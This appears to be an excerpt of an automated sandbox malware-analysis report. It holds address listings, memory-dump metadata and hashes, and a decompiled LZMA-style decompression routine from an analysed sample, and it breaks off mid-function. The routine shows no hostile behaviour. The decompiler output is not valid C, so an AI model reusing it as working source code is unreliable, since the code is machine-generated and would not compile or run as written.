                                  0x00000000
                                  0x00000000
                                  0x00406b69
                                  0x00406b6f
                                  0x00406b99
                                  0x00406b9f
                                  0x00406ba6
                                  0x00000000
                                  0x00406ba6
                                  0x00406b75
                                  0x00406b78
                                  0x00406b7d
                                  0x00406b7d
                                  0x00406b88
                                  0x00406b90
                                  0x00406b93
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bd8
                                  0x00406bde
                                  0x00406be1
                                  0x00406bee
                                  0x00406bf6
                                  0x00000000
                                  0x00000000
                                  0x00406bad
                                  0x00406bad
                                  0x00406bb1
                                  0x004073fc
                                  0x00000000
                                  0x004073fc
                                  0x00406bbd
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bc8
                                  0x00406bcb
                                  0x00406bce
                                  0x00406bd1
                                  0x00406bd6
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406bfe
                                  0x00406c00
                                  0x00406c03
                                  0x00406c74
                                  0x00406c77
                                  0x00406c7a
                                  0x00406c81
                                  0x00406c8b
                                  0x00000000
                                  0x00406c8b
                                  0x00406c05
                                  0x00406c09
                                  0x00406c0c
                                  0x00406c0e
                                  0x00406c11
                                  0x00406c14
                                  0x00406c16
                                  0x00406c19
                                  0x00406c1b
                                  0x00406c20
                                  0x00406c23
                                  0x00406c26
                                  0x00406c2a
                                  0x00406c31
                                  0x00406c34
                                  0x00406c3b
                                  0x00406c3f
                                  0x00406c47
                                  0x00406c47
                                  0x00406c47
                                  0x00406c41
                                  0x00406c41
                                  0x00406c41
                                  0x00406c36
                                  0x00406c36
                                  0x00406c36
                                  0x00406c4b
                                  0x00406c4e
                                  0x00406c6c
                                  0x00406c6e
                                  0x00000000
                                  0x00406c50
                                  0x00406c50
                                  0x00406c53
                                  0x00406c56
                                  0x00406c59
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5b
                                  0x00406c5e
                                  0x00406c61
                                  0x00406c63
                                  0x00406c64
                                  0x00406c67
                                  0x00000000
                                  0x00406c67
                                  0x00000000
                                  0x00406e9d
                                  0x00406ea1
                                  0x00406ebf
                                  0x00406ec2
                                  0x00406ec9
                                  0x00406ecc
                                  0x00406ecf
                                  0x00406ed2
                                  0x00406ed5
                                  0x00406ed8
                                  0x00406eda
                                  0x00406ee1
                                  0x00406ee2
                                  0x00406ee4
                                  0x00406ee7
                                  0x00406eea
                                  0x00406eed
                                  0x00406eed
                                  0x00406ef2
                                  0x00000000
                                  0x00406ef2
                                  0x00406ea3
                                  0x00406ea6
                                  0x00406ea9
                                  0x00406eb3
                                  0x00000000
                                  0x00000000
                                  0x00406f07
                                  0x00406f0b
                                  0x00406f2e
                                  0x00406f31
                                  0x00406f34
                                  0x00406f3e
                                  0x00406f0d
                                  0x00406f0d
                                  0x00406f10
                                  0x00406f13
                                  0x00406f16
                                  0x00406f23
                                  0x00406f26
                                  0x00406f26
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00406fbb
                                  0x00406fbf
                                  0x00406fc6
                                  0x00406fc9
                                  0x00406fcc
                                  0x00406fd6
                                  0x00000000
                                  0x00406fd6
                                  0x00406fc1
                                  0x00000000
                                  0x00000000
                                  0x00406fe2
                                  0x00406fe6
                                  0x00406fed
                                  0x00406ff0
                                  0x00406ff3
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406fe8
                                  0x00406ff6
                                  0x00406ff9
                                  0x00406ffc
                                  0x00406ffc
                                  0x00406fff
                                  0x00407002
                                  0x00000000
                                  0x00000000
                                  0x004070a2
                                  0x004070a2
                                  0x004070a6
                                  0x00407444
                                  0x00000000
                                  0x00407444
                                  0x004070ac
                                  0x004070af
                                  0x004070b2
                                  0x004070b6
                                  0x004070b9
                                  0x004070bf
                                  0x004070c1
                                  0x004070c1
                                  0x004070c1
                                  0x004070c4
                                  0x004070c7
                                  0x00000000
                                  0x00000000
                                  0x00406c97
                                  0x00406c97
                                  0x00406c9b
                                  0x00407408
                                  0x00000000
                                  0x00407408
                                  0x00406ca1
                                  0x00406ca4
                                  0x00406ca7
                                  0x00406cab
                                  0x00406cae
                                  0x00406cb4
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb6
                                  0x00406cb9
                                  0x00406cbc
                                  0x00406cbc
                                  0x00406cbf
                                  0x00406cc2
                                  0x00000000
                                  0x00000000
                                  0x00406cc8
                                  0x00406cce
                                  0x00000000
                                  0x00000000
                                  0x00406cd4
                                  0x00406cd4
                                  0x00406cd8
                                  0x00406cdb
                                  0x00406cde
                                  0x00406ce1
                                  0x00406ce4
                                  0x00406ce5
                                  0x00406ce8
                                  0x00406cea
                                  0x00406cf0
                                  0x00406cf3
                                  0x00406cf6
                                  0x00406cf9
                                  0x00406cfc
                                  0x00406cff
                                  0x00406d02
                                  0x00406d1e
                                  0x00406d21
                                  0x00406d24
                                  0x00406d27
                                  0x00406d2e
                                  0x00406d32
                                  0x00406d34
                                  0x00406d38
                                  0x00406d04
                                  0x00406d04
                                  0x00406d08
                                  0x00406d10
                                  0x00406d15
                                  0x00406d17
                                  0x00406d19
                                  0x00406d19
                                  0x00406d3b
                                  0x00406d42
                                  0x00406d45
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d4b
                                  0x00000000
                                  0x00406d50
                                  0x00406d50
                                  0x00406d54
                                  0x00407414
                                  0x00000000
                                  0x00407414
                                  0x00406d5a
                                  0x00406d5d
                                  0x00406d60
                                  0x00406d64
                                  0x00406d67
                                  0x00406d6d
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d6f
                                  0x00406d72
                                  0x00406d75
                                  0x00406d75
                                  0x00406d75
                                  0x00406d7b
                                  0x00000000
                                  0x00000000
                                  0x00406d7d
                                  0x00406d80
                                  0x00406d83
                                  0x00406d86
                                  0x00406d89
                                  0x00406d8c
                                  0x00406d8f
                                  0x00406d92
                                  0x00406d95
                                  0x00406d98
                                  0x00406d9b
                                  0x00406db3
                                  0x00406db6
                                  0x00406db9
                                  0x00406dbc
                                  0x00406dbc
                                  0x00406dbf
                                  0x00406dc3
                                  0x00406dc5
                                  0x00406d9d
                                  0x00406d9d
                                  0x00406da5
                                  0x00406daa
                                  0x00406dac
                                  0x00406dae
                                  0x00406dae
                                  0x00406dc8
                                  0x00406dcf
                                  0x00406dd2
                                  0x00000000
                                  0x00406dd4
                                  0x00000000
                                  0x00406dd4
                                  0x00406dd2
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00406dd9
                                  0x00000000
                                  0x00000000
                                  0x00406e14
                                  0x00406e14
                                  0x00406e18
                                  0x00407420
                                  0x00000000
                                  0x00407420
                                  0x00406e1e
                                  0x00406e21
                                  0x00406e24
                                  0x00406e28
                                  0x00406e2b
                                  0x00406e31
                                  0x00406e33
                                  0x00406e33
                                  0x00406e33
                                  0x00406e36
                                  0x00406e39
                                  0x00406e39
                                  0x00406e3f
                                  0x00406ddd
                                  0x00406ddd
                                  0x00406de0
                                  0x00000000
                                  0x00406de0
                                  0x00406e41
                                  0x00406e41
                                  0x00406e44
                                  0x00406e47
                                  0x00406e4a
                                  0x00406e4d
                                  0x00406e50
                                  0x00406e53
                                  0x00406e56
                                  0x00406e59
                                  0x00406e5c
                                  0x00406e5f
                                  0x00406e77
                                  0x00406e7a
                                  0x00406e7d
                                  0x00406e80
                                  0x00406e80
                                  0x00406e83
                                  0x00406e87
                                  0x00406e89
                                  0x00406e61
                                  0x00406e61
                                  0x00406e69
                                  0x00406e6e
                                  0x00406e70
                                  0x00406e72
                                  0x00406e72
                                  0x00406e8c
                                  0x00406e93
                                  0x00406e96
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00406e98
                                  0x00000000
                                  0x00407125
                                  0x00407125
                                  0x00407129
                                  0x00407450
                                  0x00000000
                                  0x00407450
                                  0x0040712f
                                  0x00407132
                                  0x00407135
                                  0x00407139
                                  0x0040713c
                                  0x00407142
                                  0x00407144
                                  0x00407144
                                  0x00407144
                                  0x00407147
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00407234
                                  0x00407238
                                  0x0040725a
                                  0x0040725d
                                  0x00407267
                                  0x00000000
                                  0x00407267
                                  0x0040723a
                                  0x0040723d
                                  0x00407241
                                  0x00407244
                                  0x00407244
                                  0x00407247
                                  0x00000000
                                  0x00000000
                                  0x004072f1
                                  0x004072f5
                                  0x00407313
                                  0x00407313
                                  0x00407313
                                  0x0040731a
                                  0x00407321
                                  0x00407328
                                  0x00407328
                                  0x00000000
                                  0x00407328
                                  0x004072f7
                                  0x004072fa
                                  0x004072fd
                                  0x00407300
                                  0x00407307
                                  0x0040724b
                                  0x0040724b
                                  0x0040724e
                                  0x00000000
                                  0x00000000
                                  0x004073e2
                                  0x004073e5
                                  0x00000000
                                  0x00000000
                                  0x0040701c
                                  0x0040701e
                                  0x00407025
                                  0x00407026
                                  0x00407028
                                  0x0040702b
                                  0x00000000
                                  0x00000000
                                  0x00407033
                                  0x00407036
                                  0x00407039
                                  0x0040703b
                                  0x0040703d
                                  0x0040703d
                                  0x0040703e
                                  0x00407041
                                  0x00407048
                                  0x0040704b
                                  0x00407059
                                  0x00000000
                                  0x00000000
                                  0x0040732f
                                  0x0040732f
                                  0x00407332
                                  0x00407339
                                  0x00000000
                                  0x00000000
                                  0x0040733e
                                  0x0040733e
                                  0x00407342
                                  0x0040747a
                                  0x00000000
                                  0x0040747a
                                  0x00407348
                                  0x0040734b
                                  0x0040734e
                                  0x00407352
                                  0x00407355
                                  0x0040735b
                                  0x0040735d
                                  0x0040735d
                                  0x0040735d
                                  0x00407360
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407363
                                  0x00407366
                                  0x00407366
                                  0x0040736a
                                  0x004073ca
                                  0x004073cd
                                  0x004073d2
                                  0x004073d3
                                  0x004073d5
                                  0x004073d7
                                  0x004073da
                                  0x00000000
                                  0x004073da
                                  0x0040736c
                                  0x00407372
                                  0x00407375
                                  0x00407378
                                  0x0040737b
                                  0x0040737e
                                  0x00407381
                                  0x00407384
                                  0x00407387
                                  0x0040738a
                                  0x0040738d
                                  0x004073a6

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.256961991.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.256959091.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256968817.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256971606.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256980888.000000000040C000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256984114.0000000000414000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256989671.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256992662.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256996041.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.256998648.0000000000437000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.257002367.000000000043B000.00000002.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_4505682666.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                  • Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
                                  • Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
                                  • Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 98%
                                  			E00406A4F(void* __ecx) {
                                  				void* _v8;
                                  				void* _v12;
                                  				signed int _v16;
                                  				unsigned int _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				signed int _v32;
                                  				signed int _v36;
                                  				signed int _v40;
                                  				signed int _v44;
                                  				signed int _v48;
                                  				signed int _v52;
                                  				signed int _v56;
                                  				signed int _v60;
                                  				signed int _v64;
                                  				signed int _v68;
                                  				signed int _v72;
                                  				signed int _v76;
                                  				signed int _v80;
                                  				signed int _v84;
                                  				signed int _v88;
                                  				signed int _v92;
                                  				signed int _v95;
                                  				signed int _v96;
                                  				signed int _v100;
                                  				signed int _v104;
                                  				signed int _v108;
                                  				signed int _v112;
                                  				signed int _v116;
                                  				signed int _v120;
                                  				intOrPtr _v124;
                                  				signed int _v128;
                                  				signed int _v132;
                                  				signed int _v136;
                                  				void _v140;
                                  				void* _v148;
                                  				signed int _t537;
                                  				signed int _t538;
                                  				signed int _t572;
                                  
                                  				_t572 = 0x22;
                                  				_v148 = __ecx;
                                  				memcpy( &_v140, __ecx, _t572 << 2);
                                  				if(_v52 == 0xffffffff) {
                                  					return 1;
                                  				}
                                  				while(1) {
                                  					L3:
                                  					_t537 = _v140;
                                  					if(_t537 > 0x1c) {
                                  						break;
                                  					}
                                  					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
                                  						case 0:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_v116 = _v116 + 1;
                                  							_t537 =  *_v116;
                                  							__eflags = _t537 - 0xe1;
                                  							if(_t537 > 0xe1) {
                                  								goto L174;
                                  							}
                                  							_t542 = _t537 & 0x000000ff;
                                  							_push(0x2d);
                                  							asm("cdq");
                                  							_pop(_t576);
                                  							_push(9);
                                  							_pop(_t577);
                                  							_t622 = _t542 / _t576;
                                  							_t544 = _t542 % _t576 & 0x000000ff;
                                  							asm("cdq");
                                  							_t617 = _t544 % _t577 & 0x000000ff;
                                  							_v64 = _t617;
                                  							_v32 = (1 << _t622) - 1;
                                  							_v28 = (1 << _t544 / _t577) - 1;
                                  							_t625 = (0x300 << _t617 + _t622) + 0x736;
                                  							__eflags = 0x600 - _v124;
                                  							if(0x600 == _v124) {
                                  								L12:
                                  								__eflags = _t625;
                                  								if(_t625 == 0) {
                                  									L14:
                                  									_v76 = _v76 & 0x00000000;
                                  									_v68 = _v68 & 0x00000000;
                                  									goto L17;
                                  								} else {
                                  									goto L13;
                                  								}
                                  								do {
                                  									L13:
                                  									_t625 = _t625 - 1;
                                  									__eflags = _t625;
                                  									 *((short*)(_v8 + _t625 * 2)) = 0x400;
                                  								} while (_t625 != 0);
                                  								goto L14;
                                  							}
                                  							__eflags = _v8;
                                  							if(_v8 != 0) {
                                  								GlobalFree(_v8);
                                  							}
                                  							_t537 = GlobalAlloc(0x40, 0x600); // executed
                                  							__eflags = _t537;
                                  							_v8 = _t537;
                                  							if(_t537 == 0) {
                                  								goto L174;
                                  							} else {
                                  								_v124 = 0x600;
                                  								goto L12;
                                  							}
                                  						case 1:
                                  							L15:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 1;
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
                                  							_v116 = _v116 + 1;
                                  							_t50 =  &_v76;
                                  							 *_t50 = _v76 + 1;
                                  							__eflags =  *_t50;
                                  							L17:
                                  							__eflags = _v76 - 4;
                                  							if(_v76 < 4) {
                                  								goto L15;
                                  							}
                                  							_t550 = _v68;
                                  							__eflags = _t550 - _v120;
                                  							if(_t550 == _v120) {
                                  								L22:
                                  								_v76 = 5;
                                  								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
                                  								goto L25;
                                  							}
                                  							__eflags = _v12;
                                  							_v120 = _t550;
                                  							if(_v12 != 0) {
                                  								GlobalFree(_v12); // executed
                                  							}
                                  							_t537 = GlobalAlloc(0x40, _v68); // executed
                                  							__eflags = _t537;
                                  							_v12 = _t537;
                                  							if(_t537 == 0) {
                                  								goto L174;
                                  							} else {
                                  								goto L22;
                                  							}
                                  						case 2:
                                  							L26:
                                  							_t557 = _v100 & _v32;
                                  							_v136 = 6;
                                  							_v80 = _t557;
                                  							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
                                  							goto L135;
                                  						case 3:
                                  							L23:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 3;
                                  								goto L173;
                                  							}
                                  							_v112 = _v112 - 1;
                                  							_t72 =  &_v116;
                                  							 *_t72 = _v116 + 1;
                                  							__eflags =  *_t72;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L25:
                                  							_v76 = _v76 - 1;
                                  							__eflags = _v76;
                                  							if(_v76 != 0) {
                                  								goto L23;
                                  							}
                                  							goto L26;
                                  						case 4:
                                  							L136:
                                  							_t559 =  *_t626;
                                  							_t610 = _t559 & 0x0000ffff;
                                  							_t591 = (_v20 >> 0xb) * _t610;
                                  							__eflags = _v16 - _t591;
                                  							if(_v16 >= _t591) {
                                  								_v20 = _v20 - _t591;
                                  								_v16 = _v16 - _t591;
                                  								_v68 = 1;
                                  								_t560 = _t559 - (_t559 >> 5);
                                  								__eflags = _t560;
                                  								 *_t626 = _t560;
                                  							} else {
                                  								_v20 = _t591;
                                  								_v68 = _v68 & 0x00000000;
                                  								 *_t626 = (0x800 - _t610 >> 5) + _t559;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L142;
                                  							} else {
                                  								goto L140;
                                  							}
                                  						case 5:
                                  							L140:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 5;
                                  								goto L173;
                                  							}
                                  							_v20 = _v20 << 8;
                                  							_v112 = _v112 - 1;
                                  							_t464 =  &_v116;
                                  							 *_t464 = _v116 + 1;
                                  							__eflags =  *_t464;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L142:
                                  							_t561 = _v136;
                                  							goto L143;
                                  						case 6:
                                  							__edx = 0;
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v56 = 1;
                                  								_v136 = 7;
                                  								__esi = _v8 + 0x180 + _v60 * 2;
                                  								goto L135;
                                  							}
                                  							__eax = _v96 & 0x000000ff;
                                  							__esi = _v100;
                                  							__cl = 8;
                                  							__cl = 8 - _v64;
                                  							__esi = _v100 & _v28;
                                  							__eax = (_v96 & 0x000000ff) >> 8;
                                  							__ecx = _v64;
                                  							__esi = (_v100 & _v28) << 8;
                                  							__ecx = _v8;
                                  							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
                                  							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
                                  							__eflags = _v60 - 4;
                                  							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                  							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
                                  							if(_v60 >= 4) {
                                  								__eflags = _v60 - 0xa;
                                  								if(_v60 >= 0xa) {
                                  									_t103 =  &_v60;
                                  									 *_t103 = _v60 - 6;
                                  									__eflags =  *_t103;
                                  								} else {
                                  									_v60 = _v60 - 3;
                                  								}
                                  							} else {
                                  								_v60 = 0;
                                  							}
                                  							__eflags = _v56 - __edx;
                                  							if(_v56 == __edx) {
                                  								__ebx = 0;
                                  								__ebx = 1;
                                  								goto L63;
                                  							}
                                  							__eax = _v24;
                                  							__eax = _v24 - _v48;
                                  							__eflags = __eax - _v120;
                                  							if(__eax >= _v120) {
                                  								__eax = __eax + _v120;
                                  								__eflags = __eax;
                                  							}
                                  							__ecx = _v12;
                                  							__ebx = 0;
                                  							__ebx = 1;
                                  							__al =  *((intOrPtr*)(__eax + __ecx));
                                  							_v95 =  *((intOrPtr*)(__eax + __ecx));
                                  							goto L43;
                                  						case 7:
                                  							__eflags = _v68 - 1;
                                  							if(_v68 != 1) {
                                  								__eax = _v40;
                                  								_v132 = 0x16;
                                  								_v36 = _v40;
                                  								__eax = _v44;
                                  								_v40 = _v44;
                                  								__eax = _v48;
                                  								_v44 = _v48;
                                  								__eax = 0;
                                  								__eflags = _v60 - 7;
                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                  								__al = __al & 0x000000fd;
                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                  								_v60 = (__eflags >= 0) - 1 + 0xa;
                                  								__eax = _v8;
                                  								__eax = _v8 + 0x664;
                                  								__eflags = __eax;
                                  								_v92 = __eax;
                                  								goto L71;
                                  							}
                                  							__eax = _v8;
                                  							__ecx = _v60;
                                  							_v136 = 8;
                                  							__esi = _v8 + 0x198 + _v60 * 2;
                                  							goto L135;
                                  						case 8:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v136 = 0xa;
                                  								__esi = _v8 + 0x1b0 + _v60 * 2;
                                  							} else {
                                  								__eax = _v60;
                                  								__ecx = _v8;
                                  								__eax = _v60 + 0xf;
                                  								_v136 = 9;
                                  								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
                                  								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
                                  							}
                                  							goto L135;
                                  						case 9:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								goto L92;
                                  							}
                                  							__eflags = _v100;
                                  							if(_v100 == 0) {
                                  								goto L174;
                                  							}
                                  							__eax = 0;
                                  							__eflags = _v60 - 7;
                                  							_t264 = _v60 - 7 >= 0;
                                  							__eflags = _t264;
                                  							0 | _t264 = _t264 + _t264 + 9;
                                  							_v60 = _t264 + _t264 + 9;
                                  							goto L78;
                                  						case 0xa:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__eax = _v8;
                                  								__ecx = _v60;
                                  								_v136 = 0xb;
                                  								__esi = _v8 + 0x1c8 + _v60 * 2;
                                  								goto L135;
                                  							}
                                  							__eax = _v44;
                                  							goto L91;
                                  						case 0xb:
                                  							__eflags = _v68;
                                  							if(_v68 != 0) {
                                  								__ecx = _v40;
                                  								__eax = _v36;
                                  								_v36 = _v40;
                                  							} else {
                                  								__eax = _v40;
                                  							}
                                  							__ecx = _v44;
                                  							_v40 = _v44;
                                  							L91:
                                  							__ecx = _v48;
                                  							_v48 = __eax;
                                  							_v44 = _v48;
                                  							L92:
                                  							__eax = _v8;
                                  							_v132 = 0x15;
                                  							__eax = _v8 + 0xa68;
                                  							_v92 = _v8 + 0xa68;
                                  							goto L71;
                                  						case 0xc:
                                  							L102:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xc;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t340 =  &_v116;
                                  							 *_t340 = _v116 + 1;
                                  							__eflags =  *_t340;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							__eax = _v48;
                                  							goto L104;
                                  						case 0xd:
                                  							L39:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xd;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t127 =  &_v116;
                                  							 *_t127 = _v116 + 1;
                                  							__eflags =  *_t127;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L41:
                                  							__eax = _v68;
                                  							__eflags = _v76 - _v68;
                                  							if(_v76 != _v68) {
                                  								goto L50;
                                  							}
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								goto L56;
                                  							}
                                  							L43:
                                  							__eax = _v95 & 0x000000ff;
                                  							_v95 = _v95 << 1;
                                  							__ecx = _v92;
                                  							__eax = (_v95 & 0x000000ff) >> 7;
                                  							_v76 = __eax;
                                  							__eax = __eax + 1;
                                  							__eax = __eax << 8;
                                  							__eax = __eax + __ebx;
                                  							__esi = _v92 + __eax * 2;
                                  							_v20 = _v20 >> 0xb;
                                  							__ax =  *__esi;
                                  							_v88 = __esi;
                                  							__edx = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edx;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								_v68 = 1;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								__ebx = __ebx + __ebx + 1;
                                  								 *__esi = __ax;
                                  							} else {
                                  								_v68 = _v68 & 0x00000000;
                                  								_v20 = __ecx;
                                  								0x800 = 0x800 - __edx;
                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                  								__ebx = __ebx + __ebx;
                                  								 *__esi = __cx;
                                  							}
                                  							__eflags = _v20 - 0x1000000;
                                  							_v72 = __ebx;
                                  							if(_v20 >= 0x1000000) {
                                  								goto L41;
                                  							} else {
                                  								goto L39;
                                  							}
                                  						case 0xe:
                                  							L48:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xe;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t161 =  &_v116;
                                  							 *_t161 = _v116 + 1;
                                  							__eflags =  *_t161;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							while(1) {
                                  								L50:
                                  								__eflags = __ebx - 0x100;
                                  								if(__ebx >= 0x100) {
                                  									break;
                                  								}
                                  								__eax = _v92;
                                  								__edx = __ebx + __ebx;
                                  								__ecx = _v20;
                                  								__esi = __edx + __eax;
                                  								__ecx = _v20 >> 0xb;
                                  								__ax =  *__esi;
                                  								_v88 = __esi;
                                  								__edi = __ax & 0x0000ffff;
                                  								__ecx = (_v20 >> 0xb) * __edi;
                                  								__eflags = _v16 - __ecx;
                                  								if(_v16 >= __ecx) {
                                  									_v20 = _v20 - __ecx;
                                  									_v16 = _v16 - __ecx;
                                  									__cx = __ax;
                                  									_t175 = __edx + 1; // 0x1
                                  									__ebx = _t175;
                                  									__cx = __ax >> 5;
                                  									__eflags = __eax;
                                  									 *__esi = __ax;
                                  								} else {
                                  									_v20 = __ecx;
                                  									0x800 = 0x800 - __edi;
                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                  									__ebx = __ebx + __ebx;
                                  									 *__esi = __cx;
                                  								}
                                  								__eflags = _v20 - 0x1000000;
                                  								_v72 = __ebx;
                                  								if(_v20 >= 0x1000000) {
                                  									continue;
                                  								} else {
                                  									goto L48;
                                  								}
                                  							}
                                  							L56:
                                  							_t178 =  &_v56;
                                  							 *_t178 = _v56 & 0x00000000;
                                  							__eflags =  *_t178;
                                  							goto L57;
                                  						case 0xf:
                                  							L60:
                                  							__eflags = _v112;
                                  							if(_v112 == 0) {
                                  								_v140 = 0xf;
                                  								goto L173;
                                  							}
                                  							__ecx = _v116;
                                  							__eax = _v16;
                                  							_v20 = _v20 << 8;
                                  							__ecx =  *_v116 & 0x000000ff;
                                  							_v112 = _v112 - 1;
                                  							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							_t208 =  &_v116;
                                  							 *_t208 = _v116 + 1;
                                  							__eflags =  *_t208;
                                  							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                                  							L62:
                                  							__eflags = __ebx - 0x100;
                                  							if(__ebx >= 0x100) {
                                  								L57:
                                  								__al = _v72;
                                  								_v96 = _v72;
                                  								goto L58;
                                  							}
                                  							L63:
                                  							__eax = _v92;
                                  							__edx = __ebx + __ebx;
                                  							__ecx = _v20;
                                  							__esi = __edx + __eax;
                                  							__ecx = _v20 >> 0xb;
                                  							__ax =  *__esi;
                                  							_v88 = __esi;
                                  							__edi = __ax & 0x0000ffff;
                                  							__ecx = (_v20 >> 0xb) * __edi;
                                  							__eflags = _v16 - __ecx;
                                  							if(_v16 >= __ecx) {
                                  								_v20 = _v20 - __ecx;
                                  								_v16 = _v16 - __ecx;
                                  								__cx = __ax;
                                  								_t222 = __edx + 1; // 0x1
                                  								__ebx = _t222;
                                  								__cx = __ax >> 5;
                                  								__eflags = __eax;
                                  								 *__esi = __ax;
                                  							} else {
                                  								_v20 = __ecx;
